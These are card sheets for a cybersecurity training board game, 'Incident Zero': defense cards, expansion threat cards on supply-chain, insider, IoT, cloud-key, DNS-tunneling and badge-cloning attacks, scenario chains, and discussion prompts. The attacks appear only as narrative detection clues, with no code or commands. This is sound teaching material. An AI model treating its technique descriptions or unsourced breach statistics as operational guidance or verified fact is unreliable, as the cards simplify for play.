│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy network-based IPS with │
│ exploit signatures. Monitor for │
│ known CVE exploitation patterns. │
│ Configure WAF (Web Application │
│ Firewall) rules for SQL injection, │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Blocks exploitation attempts in │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK, │
│ DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Subscribe to threat intelligence │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM, │
│ and proxy. Participate in │
│ information sharing communities. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables faster detection of known │
│ malicious IPs and domains. │
│ Identifies emerging threats │
│ targeting your industry. Reduces │
│ detection time from days to minutes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish proactive threat hunting │
│ using MITRE ATT&CK framework. │
│ Hunt for living-off-the-land │
│ techniques, anomalous processes, │
│ suspicious registry changes, and │
│ memory injection. Use automated │
│ tools (OSQuery, Velociraptor). │
├─────────────────────────────────────┤
│ EFFECT: │
│ Finds advanced attacks that bypass │
│ signature-based detection. Detects │
│ LSASS dumping, scheduled task │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MEMORY FORENSICS │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy memory capture and analysis │
│ (Volatility, Memoryze). Create │
│ memory images of suspicious systems.│
│ Analyze for credential dumping, │
│ injected code, and rootkits. Extract│
│ evidence for incident response. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects Mimikatz attacks and │
│ credential harvesting. Reveals │
│ attacker activities hidden from │
│ disk forensics. Critical for │
│ identifying advanced persistence │
│ mechanisms. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS) │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy decoy systems (fake file │
│ servers, databases, credentials) │
│ to detect lateral movement. Create │
│ canary tokens that alert when │
│ accessed. Deploy honeypots for web │
│ exploit detection. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Any access to honeypots indicates │
│ active compromise. Detects lateral │
│ movement with zero false positives. │
│ Slows attacker progress and forces │
│ reconnaissance, increasing detection│
│ time. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Enable Windows Credential Guard to │
│ isolate LSASS in virtualized │
│ container. Implement UEFI Secure │
│ Boot to prevent bootkit attacks. │
│ Enable TPM attestation for device │
│ integrity validation. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes Mimikatz credential dumping │
│ ineffective. Prevents bootloader │
│ manipulation. Ensures firmware │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in │
│ isolated environments. Generate │
│ behavioral indicators and YARA │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement zero-trust architecture: │
│ verify every access request │
│ regardless of source. Deploy device │
│ identity, user identity, and │
│ behavior analytics. Implement │
│ conditional access policies. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Eliminates implicit trust based on │
│ network location. Even compromised │
│ devices cannot access sensitive │
│ resources without proper │
│ authentication and behavior │
│ validation. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy container runtime security │
│ (Falco, Sysdig). Implement image │
│ scanning for vulnerabilities. Use │
│ policy enforcement engines (OPA/ │
│ Gatekeeper). Implement network │
│ policies for container │
│ segmentation. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects container escape attempts. │
│ Prevents vulnerable images from │
│ running. Limits lateral movement │
│ within containerized environments. │
│ Critical for modern cloud │
│ applications. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM) │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy enterprise SIEM (Splunk, │
│ ELK, QRadar). Centralize logs from │
│ all sources. Implement automated │
│ correlation rules, threat │
│ intelligence integration, and │
│ incident response workflows. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Provides centralized visibility │
│ into all security events. Enables │
│ rapid threat detection and │
│ investigation. Foundation for a │
│ mature incident response program. │
└─────────────────────────────────────┘
Distribution by Countermeasure (v2.2): - SOCIAL ENGINEERING: 2 defenses (D-01, D-02) - WEB EXPLOIT: 2 defenses (D-03, D-18) - CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20) - MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21) - NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24) - DATA EXFIL: 2 defenses (D-11, D-24)
Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.
The ideas below have been built out as printable expansion cards:
Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.
Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.
Sample card sheets for Incident Zero board game
For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md
cards/incident-response/expansion-deck/advanced-threats.md
This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your monitoring systems detect │
│ unusual outbound connections from │
│ a recently deployed software update │
│ to an IP address not associated │
│ with the vendor. The update was │
│ digitally signed but verification │
│ shows the signature was backdated. │
│ Hundreds of organizations received │
│ the same malicious update." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Supply chain compromises affect │
│ entire industries simultaneously. │
│ Organizations trust vendor updates │
│ and often deploy them automatically │
│ without deep inspection. The │
│ attacker gains access to thousands │
│ of targets at once. Real-world │
│ example: SolarWinds, 3CX. │
│ │
│ DETECTION DIFFICULTY: High │
│ The malware appears legitimate due │
│ to trusted vendor origin. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY │
│ INJECTION │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your dependency scanning tool │
│ alerts on a typosquatted NPM │
│ package (npm package manager) that │
│ was installed in your build │
│ pipeline. The malicious package has │
│ the same name as a popular logging │
│ library but with a slight misspell. │
│ It has been downloaded 50k times. │
│ Your build logs show it was │
│ installed 6 days ago." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Developers rely on open-source │
│ packages from package managers │
│ (npm, PyPI, Maven). Attackers │
│ upload malicious packages with │
│ names similar to popular libraries │
│ (typosquatting). Once downloaded, │
│ the malicious code runs during │
│ build/deployment. This affects │
│ every application built from that │
│ point forward. │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires dependency scanning and │
│ behavior analysis of build processes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your DLP system flags a large │
│ volume of sensitive data being │
│ copied by an IT operations │
│ employee during off-hours. Their │
│ user account accessed databases │
│ they don't normally interact with. │
│ The data was copied to a removable │
│ USB drive connected to a shared │
│ workstation. Security badge logs │
│ show they entered the building at │
│ 2 AM when the office was empty." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Insiders have legitimate access and │
│ often bypass security controls. │
│ Their activities may not trigger │
│ alerts because their permissions │
│ are valid. Detection requires: │
│ - Behavioral analysis (unusual │
│ times/volumes) │
│ - Physical security controls │
│ - DLP and USB device control │
│ - Privileged access management │
│ Insiders cause 30-40% of data │
│ breaches in many industries. │
│ │
│ DETECTION DIFFICULTY: Very High │
│ Insider actions often look normal │
│ to automated systems. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "A recently terminated database │
│ administrator appears to have │
│ retained remote access using a │
│ dormant service account they │
│ created months ago. Logs show │
│ connection attempts from their │
│ home IP address. They've been │
│ modifying stored procedures and │
│ adding logic bombs set to trigger │
│ in 30 days. Your team notices │
│ their employee laptop is still │
│ configured with VPN certificates." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Disgruntled employees often have │
│ privileged access and deep system │
│ knowledge. They may have created │
│ backdoors before termination. │
│ Offboarding failures (not revoking │
│ certs, not disabling accounts) are │
│ common. Defense requires: │
│ - Complete offboarding procedures │
│ - Privileged access review │
│ - Anomalous activity detection │
│ - Behavior analysis for terminated │
│ employees │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires correlation of access │
│ patterns and employee status changes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT │
│ POINT │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your network monitoring detects │
│ unusual traffic from an IoT device │
│ (surveillance camera) in the │
│ building. The device is communicating│
│ with a command server overseas and │
│ tunneling internal network traffic. │
│ Your asset inventory shows this │
│ camera was never formally added to │
│ any security program. It's running │
│ firmware from 2019 with known │
│ vulnerabilities." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ IoT devices are often neglected in │
│ security programs (cameras, printers,│
│ thermostats, building automation). │
│ They run outdated firmware and have │
│ weak or default credentials. Once │
│ compromised, they provide network │
│ access and can pivot to critical │
│ systems. Many organizations don't │
│ inventory or monitor IoT devices. │
│ │
│ DETECTION DIFFICULTY: Medium │
│ Requires network monitoring and │
│ device inventory practices. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your AWS CloudTrail logs show API │
│ calls from unusual IP addresses │
│ using API keys belonging to a │
│ developer who left the company 6 │
│ months ago. The calls are creating │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching │
│ EC2 instances in regions where you │
│ don't normally operate. The API key │
│ was embedded in old GitHub │
│ repository code." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Cloud API tokens/keys are often │
│ exposed in code repositories or │
│ configuration files. Once exposed, │
│ they provide direct access to cloud │
│ resources. Attackers can spin up │
│ resources, steal data, or deploy │
│ cryptominers. Many organizations │
│ fail to rotate or revoke old API │
│ keys. Detection requires: │
│ - API audit logging │
│ - Anomalous API pattern detection │
│ - Key rotation policies │
│ - Secrets scanning in repos │
│ │
│ DETECTION DIFFICULTY: Medium-High │
│ Requires cloud monitoring and │
│ secrets management practices. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your DNS query logs show massive │
│ volume of unusual subdomains being │
│ queried through an external DNS │
│ resolver. The subdomain names look │
│ like Base64-encoded data. Queries │
│ are happening in steady intervals. │
│ Query timestamps align with your │
│ database being accessed. Your DLP │
│ didn't flag anything because DNS is │
│ typically trusted." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ DNS tunneling encodes data in DNS │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks. │
│ Defense requires: │
│ - DNS query content analysis │
│ - Anomalous query pattern detection │
│ - DNS rate limiting │
│ - External DNS access restrictions │
│ │
│ DETECTION DIFFICULTY: Very High │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING │
│ ATTACK │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your security team discovers that │
│ an RFID badge belonging to a │
│ manager was cloned using a portable │
│ reader. The cloned badge was used │
│ to gain access to your secure data │
│ center after-hours. Badge access │
│ logs are timestamped, but the │
│ person's schedule shows they weren't│
│ in the office that evening. Your │
│ server room CCTV captured footage │
│ of an unknown individual installing │
│ a wireless device in the network │
│ rack." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Physical security is often │
│ overlooked in cybersecurity │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once │
│ inside the data center, attackers │
│ can install rogue network devices, │
│ steal hardware, or gain console │
│ access to servers. Defense requires:│
│ - Encrypted badge technology │
│ - Multi-factor access (biometric) │
│ - CCTV monitoring │
│ - Environmental controls │
│ - Equipment inventory tracking │
│ - Badge deactivation on exit │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires integration of physical │
│ and cyber security monitoring. │
└─────────────────────────────────────┘
Teaches: Third-party risk management, vendor security assessment, incident response at scale 1. Compromised Software Vendor Update (Initial Compromise) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Beaconing to C2 Server (C2 & Exfil) → NETWORK 5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL
Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).
Teaches: Insider risk detection, privileged access management, offboarding procedures 1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE 4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL
Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).
Teaches: IoT security, cloud security, API management, defense breadth 1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL
Parallel threat: Teams must defend against both cloud and on-premises infrastructure simultaneously.
Teaches: Physical security integration, environmental controls, holistic security 1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE
Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."
Teaches: Complex attack coordination, detecting collusion, multi-vector threats 1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE 2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL 5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL
Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). Incomplete investigation leads to missed detection of the insider component.
(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.
Real-world context: - SolarWinds (2020) - 18,000+ organizations affected - 3CX (2023) - Trojanized build system - XcodeGhost (2015) - Compromised Xcode developer tool - Typosquatted packages discovered monthly on npm/PyPI
Discussion points after reveal: - "How do you verify software authenticity?" - "What's the difference between detecting supply chain compromises vs. traditional malware?" - "Why is this harder to detect than direct attacks?"
Real-world context: - ~30-40% of data breaches involve insiders (Verizon DBIR) - Manning, Snowden, Reality Winner cases (government sector) - Thousands of employee theft cases in financial/tech industries
Discussion points after reveal: - "How would you detect insider threat indicators before damage occurs?" - "Why is offboarding security often weak?" - "What's the difference between a malicious insider and negligent employee?"
Real-world context: - Mirai botnet (2016) - Millions of compromised IoT devices - Connected cameras, printers, thermostats often neglected - "Shadow IT" problem in many organizations
Discussion points after reveal: - "Should IoT devices be on the same network as critical systems?" - "How do you patch thousands of IoT devices?" - "Why are credentials often factory-default on IoT?"
Real-world context: - AWS credentials leaked in GitHub ~8 times per day (GitHub telemetry) - Tesla's Kubernetes cluster hacked via exposed credentials - Capital One breach involved compromised IAM role
Discussion points after reveal: - "How do you manage API keys for thousands of developers?" - "Why is secrets rotation hard in practice?" - "How would you know if someone used your AWS API key?"
Real-world context: - Used by DNS.Exfiltrator, OilRig APT, Turla malware families - Hard to detect because DNS is typically trusted - Can exfil ~20 KB/hour via subdomains
Discussion points after reveal: - "Why is DNS hard to monitor?" - "What would a normal DNS query pattern look like?" - "How would you distinguish data exfil from normal DNS activity?"
Real-world context: - RFID cloning demonstrated on hotel keys, building badges - Rogue network devices found in data centers (Target breach had physical component) - USB drops with malware remain effective attack vectors
Discussion points after reveal: - "Should cybersecurity teams care about physical security?" - "How do you audit data center access?" - "What's harder to defend: cyber or physical attacks?"
| Card | Title | Step | Vector | Difficulty |
|---|---|---|---|---|
| T-13 | Compromised Software Vendor Update | INITIAL | MALWARE | Hard |
| T-14 | Malicious Third-Party Library Injection | INITIAL | MALWARE | Medium |
| T-15 | Malicious Insider Data Theft | C2 & EXFIL | DATA EXFIL | Very Hard |
| T-16 | Disgruntled Employee Sabotage | PIVOT & ESCALATE | MALWARE | Hard |
| T-17 | Compromised IoT Device as Pivot Point | INITIAL | NETWORK | Medium |
| T-18 | Cloud API Token Theft & Abuse | PIVOT & ESCALATE | CREDENTIAL ABUSE | Hard |
| T-19 | DNS Tunneling Data Exfiltration | C2 & EXFIL | DATA EXFIL | Very Hard |
| T-20 | Physical Access + Badge Cloning | INITIAL | CREDENTIAL ABUSE | Hard |
Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections
cards/incident-response/expansion-deck/advanced-defenses.md
This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.
Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy application whitelisting on │
│ critical workstations and servers. │
│ Maintain an approved applications │
│ list (Word, Excel, Chrome, etc.). │
│ Block execution of any unapproved │
│ binaries. Use AppLocker (Windows) │
│ or similar tools. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents execution of malware and │
│ unauthorized tools. Attackers cannot│
│ run ransomware, backdoors, or │
│ penetration tools if they're not on │
│ the whitelist. Effective against │
│ zero-days if not signed by trusted │
│ publishers. │
│ │
│ LIMITATION: False positives if │
│ maintenance is poor. Users may │
│ struggle with legitimate tools │
│ being blocked. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy AI-powered application │
│ control that learns normal program │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious │
│ or anomalous applications. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new │
│ applications without manual updates.│
│ Catches polymorphic malware variants│
│ that might bypass static whitelisting│
│ (different packing, slight name │
│ changes). Reduces false positives. │
│ │
│ LEARNING CURVE: Requires baseline │
│ training period (1-2 weeks). │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy advanced script and tool │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and │
│ other "living-off-the-land" tools. │
│ Allow only specific, monitored usage│
│ with strong justification logging. │
│ Monitor for obfuscation patterns. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Directly targets attacker techniques│
│ used in privilege escalation and │
│ lateral movement (scheduled tasks, │
│ registry modification, credential │
│ dumping). Makes PowerShell and cmd │
│ attacks extremely difficult. │
│ Works especially well with EDR. │
│ │
│ IMPACT: May break legitimate admin │
│ tasks; requires strong change │
│ management. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy behavioral analytics that │
│ establishes baseline profiles for │
│ users, systems, and network traffic.│
│ System learns what "normal" looks │
│ like, then alerts on deviations. │
│ Monitors: login times, file access, │
│ network destinations, resource usage.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects anomalies like: │
│ - Unusual login geography/time │
│ - Data access patterns changing │
│ - Lateral movement via SMB │
│ - New network destinations │
│ Works best as a *combination* with │
│ other tools. Requires good baseline │
│ data (1-2 weeks of normal traffic). │
│ │
│ DETECTS: Insider threats, │
│ compromised credentials, APT tactics.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy process-level behavioral │
│ monitoring that learns what each │
│ application normally does (file I/O,│
│ network calls, registry access, │
│ child processes spawned). Blocks │
│ anomalous behavior from legitimate │
│ binaries. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches: │
│ - Legitimate apps compromised by │
│ supply chain attack │
│ - Process injection attacks │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes │
│ Example: Word.exe normally doesn't │
│ spawn PowerShell; if it does, block │
│ and alert. │
│ │
│ DETECTS: Zero-day malware, APT │
│ techniques, supply chain compromises.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy ML models trained on terabytes│
│ of security data. System detects │
│ subtle anomalies humans would miss: │
│ subtle timing changes, rare resource│
│ combinations, statistical outliers. │
│ Continuously retrains on new data. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems. │
│ Detects: │
│ - Polymorphic malware variations │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior) │
│ - Sophisticated insider threats │
│ - Supply chain compromises │
│ │
│ TRADE-OFF: False positives require │
│ human analysis. Requires large │
│ datasets for training. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Scan all container images before │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate │
│ scanning into CI/CD pipeline. │
│ Block images with critical CVEs │
│ from being deployed. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents deployment of vulnerable │
│ containers. Catches: │
│ - Old base images with known CVEs │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into │
│ images │
│ Works best when combined with │
│ runtime monitoring. │
│ │
│ LIMITATION: Only catches known │
│ vulnerabilities (CVE databases). │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy runtime security monitoring │
│ that enforces security policies on │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor │
│ or SELinux profiles. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects and blocks: │
│ - Container escape attempts │
│ - Lateral movement between containers│
│ - Privilege escalation in container │
│ - Anomalous process execution │
│ - Unexpected network connections │
│ Works against both known and unknown│
│ attacks (zero-day exploits). │
│ │
│ REQUIREMENT: Requires kernel-level │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement Kubernetes network policies│
│ to restrict container-to-container │
│ communication. Deploy role-based │
│ access control (RBAC) for API access│
│ and service accounts. Enforce pod │
│ security policies and admission │
│ controllers. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Implements micro-segmentation in │
│ containerized environments. Prevents:│
│ - Lateral movement between pods │
│ - Container escape attacks accessing │
│ host network │
│ - Privilege escalation via RBAC │
│ - Unauthorized Kubernetes API access│
│ │
│ COMPLEXITY: Requires mature │
│ Kubernetes operations and expertise. │
